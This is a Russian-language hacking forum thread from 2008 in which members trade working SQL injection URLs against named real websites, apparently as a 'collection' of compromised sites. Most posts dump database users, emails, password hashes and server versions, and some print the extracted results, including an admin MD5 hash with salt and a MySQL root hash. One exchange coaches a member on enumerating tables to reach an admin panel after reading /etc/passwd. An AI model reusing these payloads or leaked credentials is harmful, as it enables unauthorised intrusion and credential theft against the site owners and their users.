23.08.2008, 14:34
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
С нами:
9513970
Репутация:
35
|
|
Код:
http://www.nofollow.ru/?page=articles&artcat=23&artid=1955+union+select+1,2,concat(username,0x3a3a,password),3,5,6+from+user/*
Админка: http://www.nofollow.ru/_admin_
Но видимо там .htpassword или как там его  |
|
|
23.08.2008, 15:11
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
Код:
http://bukvoed.ru/index.php?page=freec&act=reada&qid=4386+and+4386=-1+union+select+1,2,3,concat(fio,0x3a,email,0x3a,pwd),5+from+be_users/*
фио-мыло-пасс
странная у них система юзеров :/ |
|
|
|
23.08.2008, 19:07
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
Код:
http://www.asud.net/Iniziative/iniziativa.php?in=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.1.22-standard-log:asud_net_2007_cv:GDM925_claudio@81.88.49.12
3
4
7
|
|
|
|
23.08.2008, 19:30
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами:
9395645
Репутация:
7
|
|
Подсобите в админку попасть ?
http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,i d,name,password,status),9,10,11,12,13+from+_2.main _users--
Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог,
разрешена запись, но не найти директорию.
Есть пароли но ХЗ где админка !
такая вот тема  |
|
|
|
24.08.2008, 00:57
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами:
10260776
Репутация:
185
|
|
Сообщение от softrix
Подсобите в админку попасть ?
http://www.emirate.ru/cgi-bin/full_details.cgi?&id_tourist=21852&country=oae&id=-148+union+select+1,2,3,4,5,6,7,concat_ws(%27:%27,i d,name,password,status),9,10,11,12,13+from+_2.main _users--
Разрешено чтение файлов, но прочесть кроме /etc/passwd ниче не смог,
разрешена запись, но не найти директорию.
Есть пароли но ХЗ где админка !
такая вот тема Там может и не быть админки конкретно у этого сайта. Я так понимаю что база к которой он привязан общается еще с десятком сайтов. Или же просто криворукий одмин навставлял 10000000 движков таблиц и всякой такой хрени, потому как там оч много баз и таблиц...
Код:
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+selec t+1,table_name,3+from+information_schema.tables/* - Это для таблиц
http://www.emirate.ru/subscribe.php?&sub=-25+uni on+sele ct+1,table_schema,3+from+information_schema.tables/* - Это для имен Баз
Вот те линк на таблицы, дальше раскручивай сам, если есть желание.
Там даж вордпресс стоит =)
Код:
http://www.emirate.ru/subscribe.php?&s ub=-25+union+select+1,option_na me,option_value+from+wordpress.wp_options/*
_http://smart-journeys.com
Кароч если подрочить, можешь много всякого там накрутить)))
Удачи. Если че интересного найдешь отпишись. Интересно. а самому ковырять времени нету)
|
|
|
|
24.08.2008, 11:10
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
Код:
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+1,2,unhex(hex(version())),4/*
Версия 4,но мне повезло
Код:
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+unhex(hex(password)),2,unhex(hex(user)),4+from+mysql.user/*
root: 066bc62049564980 |
|
|
|
24.08.2008, 11:11
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами:
9420866
Репутация:
228
|
|
Пополним коллекцию:
http://www.svadba.tu2.ru/
Код:
http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user,0x3a,database())--
version() - 5.0.51a
user() - logsvadba6@localhost
database() - logsvadba6
Достаем хэш админа:
Код:
http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users--
username : pass(md5) : salt
admin : 589ffec19b0ce895974aec9a5425e603 : S6L9oPNyOuyrzK9d |
|
|
|
24.08.2008, 12:26
|
|
Познающий
Регистрация: 13.04.2008
Сообщений: 42
С нами:
9513970
Репутация:
35
|
|
Ну и я немного  :
Код:
http://www.flirtanica.ru/articles1.php?id=-262+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())/*
4.1.22:wwwflirtanicaru:flirtani@localhost |
|
|
|
24.08.2008, 13:26
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
Код:
http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(user())),unhex(hex(version())),unhex(hex(database())),12,13,14,15,16,17,18,19,20,21/*
uv0001@localhost
4.1.14-log
uv0001_barcelo |
|
|
|
24.08.2008, 14:39
|
|
Постоянный
Регистрация: 23.04.2007
Сообщений: 646
С нами:
10027046
Репутация:
1035
|
|
АвиаБилеты в Москве
www.samoletom.ru
Код:
http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),4,5,6,7,8,9,10/*
samoletom_db@localhost, 5.0.18-log
Таблички нормально перебираются
Код:
http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+16,1/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
